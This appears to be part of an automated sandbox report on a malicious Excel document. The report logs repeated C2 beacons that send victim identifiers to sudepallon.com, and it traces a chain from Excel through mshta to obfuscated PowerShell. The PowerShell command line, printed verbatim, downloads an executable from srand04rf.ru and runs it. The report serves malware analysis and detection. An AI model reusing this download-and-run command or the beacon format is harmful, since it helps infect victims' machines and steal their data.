    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cCAZXARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.2.3 | 49794 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:09.661709070 CEST | 6069 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:09.730118990 CEST | 6069 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cTNMGARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.3 | 49795 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:10.059182882 CEST | 6070 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:10.127449989 CEST | 6070 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4e 54 47 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cNTGMARRABw==0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
42         | 192.168.2.3 | 49796       | 77.222.42.67   | 80               | C:\Users\Public\snd32sys.exe
Timestamp                           | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:10.434488058 CEST | 6071               | OUT       | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:10.502567053 CEST | 6071               | IN        | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cQFUJARRABw==0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
43         | 192.168.2.3 | 49797       | 77.222.42.67   | 80               | C:\Users\Public\snd32sys.exe
Timestamp                           | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:10.798916101 CEST | 6072               | OUT       | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:10.867554903 CEST | 6073               | IN        | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:12 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cTHSGARRABw==0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
44         | 192.168.2.3 | 49798       | 77.222.42.67   | 80               | C:\Users\Public\snd32sys.exe
Timestamp                           | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:12.563224077 CEST | 6073               | OUT       | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:12.632021904 CEST | 6074               | IN        | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:14 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cMMNNARRABw==0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
45         | 192.168.2.3 | 49799       | 77.222.42.67   | 80               | C:\Users\Public\snd32sys.exe
Timestamp                           | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:12.942617893 CEST | 6074               | OUT       | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:13.008268118 CEST | 6075               | IN        | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:14 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cNYBMARRABw==0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
46         | 192.168.2.3 | 49800       | 77.222.42.67   | 80               | C:\Users\Public\snd32sys.exe
Timestamp                           | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:13.320719004 CEST | 6076               | OUT       | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:13.388214111 CEST | 6076               | IN        | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:14 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cVZAEARRABw==0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
47         | 192.168.2.3 | 49801       | 77.222.42.67   | 80               | C:\Users\Public\snd32sys.exe
Timestamp                           | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:13.690525055 CEST | 6077               | OUT       | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:13.764219046 CEST | 6077               | IN        | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 54 4d 4e 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cTMNGARRABw==0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
48         | 192.168.2.3 | 49802       | 77.222.42.67   | 80               | C:\Users\Public\snd32sys.exe
Timestamp                           | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:14.084805965 CEST | 6078               | OUT       | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:14.151746035 CEST | 6078               | IN        | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cNYBMARRABw==0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
5          | 192.168.2.3 | 49759       | 77.222.42.67   | 80               | C:\Users\Public\snd32sys.exe
Timestamp                           | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:54.344192028 CEST | 5702               | OUT       | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:54.414891005 CEST | 5703               | IN        | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:31:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cZNMAARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49760 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:54.742374897 CEST | 5716 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:54.810606956 CEST | 5801 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTKPGARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49761 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:55.212100029 CEST | 6031 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:55.280215025 CEST | 6031 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 48 53 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBHSYARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49762 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:55.649635077 CEST | 6032 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:55.718817949 CEST | 6032 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cHGTSARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49763 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:56.101624966 CEST | 6033 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:56.167244911 CEST | 6033 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cKMNPARRABw==0


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:07
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
                                                                                                                                                  Imagebase:0xb0000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:10
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                  Imagebase:0xc10000
                                                                                                                                                  File size:13312 bytes
                                                                                                                                                  MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:11
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
                                                                                                                                                  Imagebase:0xe50000
                                                                                                                                                  File size:430592 bytes
                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:12
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

General

Start time:16:30:31
Start date:08/07/2021
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
Imagebase:0xe50000
File size:430592 bytes
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high
